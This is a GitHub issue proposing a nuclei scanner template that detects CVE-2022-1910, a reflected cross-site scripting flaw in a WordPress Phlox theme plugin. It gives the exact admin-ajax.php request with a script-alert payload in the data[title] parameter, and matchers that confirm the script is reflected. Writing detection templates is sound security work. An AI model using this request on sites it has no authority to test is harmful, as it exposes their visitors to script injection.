### ISSUE TITLE
Shortcodes and extra features for Phlox theme < 2.9.8 - Reflected Cross-Site-Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4813]
```yaml
id: CVE-2022-1910

info:
  name: Shortcodes and extra features for Phlox theme < 2.9.8 - Reflected Cross-Site-Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not sanitise and escape a parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/8afe1638-66fa-44c7-9d02-c81573193b47
  tags: wp-plugin,xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
